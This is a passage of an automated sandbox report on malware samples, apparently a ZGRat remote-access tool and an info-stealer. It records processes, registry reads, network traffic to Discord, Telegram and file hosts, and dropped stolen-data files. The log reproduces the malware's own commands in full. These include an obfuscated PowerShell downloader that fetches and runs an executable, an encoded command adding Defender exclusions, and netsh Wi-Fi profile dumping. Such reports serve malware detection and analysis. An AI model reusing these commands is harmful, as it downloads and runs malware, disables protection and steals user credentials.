| N/A | icanhazip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3856 set thread context of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.18.115.97:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| US | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 97.115.18.104.in-addr.arpa | udp |
| US | 104.18.115.97:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store9.gofile.io | udp |
| US | 206.168.190.239:443 | store9.gofile.io | tcp |
| US | 8.8.8.8:53 | 239.190.168.206.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 104.18.115.97:80 | icanhazip.com | tcp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/3856-1-0x0000000000240000-0x0000000000458000-memory.dmp
memory/3856-0-0x0000000074790000-0x0000000074F40000-memory.dmp
memory/3856-2-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/3856-3-0x0000000004EE0000-0x00000000050E8000-memory.dmp
memory/3856-4-0x0000000005160000-0x000000000536A000-memory.dmp
memory/3856-5-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-10-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-14-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-18-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-24-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-28-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-34-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-36-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-40-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-44-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-48-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-50-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-54-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-58-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-62-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-66-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-68-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-64-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-60-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-56-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-52-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-46-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-42-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-38-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-32-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-30-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-26-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-22-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-20-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-16-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-12-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-8-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-6-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-937-0x0000000005370000-0x0000000005371000-memory.dmp
memory/3856-939-0x0000000005400000-0x000000000544C000-memory.dmp
memory/3856-938-0x0000000005620000-0x00000000057C2000-memory.dmp
memory/3856-940-0x0000000006DF0000-0x0000000007394000-memory.dmp
memory/2148-944-0x0000000000400000-0x0000000000592000-memory.dmp
memory/2148-947-0x0000000005180000-0x00000000051E6000-memory.dmp
memory/2148-946-0x0000000074790000-0x0000000074F40000-memory.dmp
memory/3856-945-0x0000000074790000-0x0000000074F40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File2crypt.exe.log
| MD5 | 4a911455784f74e368a4c2c7876d76f4 |
| SHA1 | a1700a0849ffb4f26671eb76da2489946b821c34 |
| SHA256 | 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c |
| SHA512 | 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d |
memory/2148-948-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-953-0x0000000005160000-0x0000000005168000-memory.dmp
memory/2148-952-0x00000000056F0000-0x0000000005716000-memory.dmp
memory/2148-951-0x0000000005660000-0x00000000056F2000-memory.dmp
memory/2148-955-0x00000000067A0000-0x00000000067A8000-memory.dmp
memory/2148-956-0x00000000067C0000-0x00000000067DE000-memory.dmp
memory/2148-954-0x0000000006790000-0x000000000679A000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2148-1013-0x0000000006B20000-0x0000000006BB2000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Process.txt
| MD5 | cd3f1b337705d2b32c17dc4adc97a2b4 |
| SHA1 | 45e048692510d63446ee2a5ecabe106b89306bd4 |
| SHA256 | d8d763b2649f655efa9b5cf7eb82b56be32bfafbc098577736de35e875d87a48 |
| SHA512 | 2bd512434dd7066dab77565136dcbe73d869191ef4f09bc458529af3d0b4c88c5898fcdbd644dad80259e12cbefffe36d26a3fe2c252b47117c1a29a7cc9200f |
memory/2148-1112-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1114-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1148-0x00000000068B0000-0x000000000692A000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Apps.txt
| MD5 | 8e3475a0678a63edc092dda39fc9bb2d |
| SHA1 | 589ce3f8ba1797024f6c0ab06b248c67cf739cac |
| SHA256 | d2ab564b653221a1ee2f60b56437698ea39533e8aaff5773eb4506c3be227099 |
| SHA512 | fe263f2624d887400570d3ccaf1c6e79b239f62a1ca20e3bca6c928056be7c84b405ad80dc4bd91b073272a76852ddc8032d586142e272db2beafafd1a0ad96f |
memory/2148-1221-0x00000000069D0000-0x0000000006A82000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Debug.txt
| MD5 | 6038c6816d6cd11f7c460c00b2238fc6 |
| SHA1 | d4e182455aa02a3363a6ebb5cb0ea987b2507b69 |
| SHA256 | 856b43e957bd20204f0f34b645706175d6eeb18120e135eccae5d39d99780ca0 |
| SHA512 | b00b0ce6fb86f2298c18c6ce748f71882aefe6d995b61e82494edb4647849596537b7e40c8dd7e64d5eae24d2496063d6aa9a24d9ce5a354ca94a85bb6ee4278 |
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/2148-1223-0x0000000006D20000-0x0000000006D42000-memory.dmp
memory/2148-1224-0x0000000007E20000-0x0000000008174000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\msgid.dat
| MD5 | 2c293d26d4955cc89b70566a8fd0b371 |
| SHA1 | 20849f72e81215208fc91c52ba2caf57993466bb |
| SHA256 | 499481147f342836968aa4af73d5280686a48c91eb9837eda1a1cfcf07f59121 |
| SHA512 | 2b82cfed0ce3d49376eacdede47010965d529cc45d8c26d9d0bc96df56005f65eef608c177d21fd073284cb3985fbf238bd7ef66638b968977e6a7d01148810a |
memory/2148-1236-0x0000000006E70000-0x0000000006E7A000-memory.dmp
memory/2148-1237-0x0000000074790000-0x0000000074F40000-memory.dmp
memory/2148-1238-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1239-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1240-0x0000000005170000-0x0000000005180000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Binded.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Binded.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\blbrok.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3756 set thread context of 5004 | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 3200 set thread context of 1924 | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\blbrok.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\binded.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ckCYMarg($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs){[IO.File]::WriteAllBytes($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs)};function WypStgKENDEIcA($ZMHRISzDhdwdY){if($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58153,58161,58161))) -eq $True){rundll32.exe $ZMHRISzDhdwdY }elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58165,58168,58102))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZMHRISzDhdwdY}elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58162,58168,58158))) -eq $True){misexec /qn /i $ZMHRISzDhdwdY}else{Start-Process $ZMHRISzDhdwdY}};function TXuAgVFpQG($hindkrPqZcNyrlU){$RgafzCFGvzVmJX = New-Object (FPFknBqQsu @(58131,58154,58169,58099,58140,58154,58151,58120,58161,58158,58154,58163,58169));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aumfRHUmZgmLSBs = $RgafzCFGvzVmJX.DownloadData($hindkrPqZcNyrlU);return $aumfRHUmZgmLSBs};function FPFknBqQsu($rxPrWTWbbzv){$lzrQhUf=58053;$IgPoeJQDbcreOFG=$Null;foreach($SheyHVSxpFbk in $rxPrWTWbbzv){$IgPoeJQDbcreOFG+=[char]($SheyHVSxpFbk-$lzrQhUf)};return $IgPoeJQDbcreOFG};function OCOpOfqedID(){$SFaTrukxkqfhJljN = $env:AppData + '\';$AHqkDmXF = $SFaTrukxkqfhJljN + 'Binded.exe'; if (Test-Path -Path $AHqkDmXF){WypStgKENDEIcA $AHqkDmXF;}Else{ $jiPMwkwJERZcU = TXuAgVFpQG (FPFknBqQsu @(58157,58169,58169,58165,58168,58111,58100,58100,58162,58150,58156,58158,58152,58099,58165,58164,58158,58168,58164,58163,58169,58164,58164,58161,58175,58099,58152,58164,58162,58100,58119,58158,58163,58153,58154,58153,58099,58154,58173,58154));ckCYMarg $AHqkDmXF $jiPMwkwJERZcU;WypStgKENDEIcA $AHqkDmXF;};;;;}OCOpOfqedID;
C:\Users\Admin\AppData\Roaming\Binded.exe
"C:\Users\Admin\AppData\Roaming\Binded.exe"
C:\Users\Admin\AppData\Local\Temp\rock.exe
"C:\Users\Admin\AppData\Local\Temp\rock.exe"
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 138.91.171.81:80 | | tcp |
| NL | 52.142.223.178:80 | | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 53.191.33.194.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| NL | 149.154.167.220:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.140.118.28:443 | | tcp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.140.118.28:443 | | tcp |
| N/A | 52.140.118.28:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.3.187.198:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.77.160.23:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 194.33.191.53:58001 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.17.179.12:80 | | tcp |
| N/A | 194.33.191.53:58001 | | tcp |
Files
memory/3844-3-0x00000000048C0000-0x00000000048D0000-memory.dmp
memory/3844-4-0x0000000004F00000-0x0000000005528000-memory.dmp
memory/3844-2-0x00000000048C0000-0x00000000048D0000-memory.dmp
memory/3844-5-0x0000000004CE0000-0x0000000004D02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwysozym.tol.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3844-16-0x0000000005770000-0x00000000057D6000-memory.dmp
memory/3844-6-0x00000000055D0000-0x0000000005636000-memory.dmp
memory/3844-1-0x0000000071ED0000-0x0000000072680000-memory.dmp
memory/3844-0-0x0000000004700000-0x0000000004736000-memory.dmp
memory/3844-17-0x00000000057E0000-0x0000000005B34000-memory.dmp
memory/3844-19-0x0000000005D40000-0x0000000005D8C000-memory.dmp
memory/3844-18-0x0000000005C80000-0x0000000005C9E000-memory.dmp
memory/3844-22-0x0000000006230000-0x0000000006252000-memory.dmp
memory/3844-23-0x00000000072B0000-0x0000000007854000-memory.dmp
memory/3844-21-0x00000000061C0000-0x00000000061DA000-memory.dmp
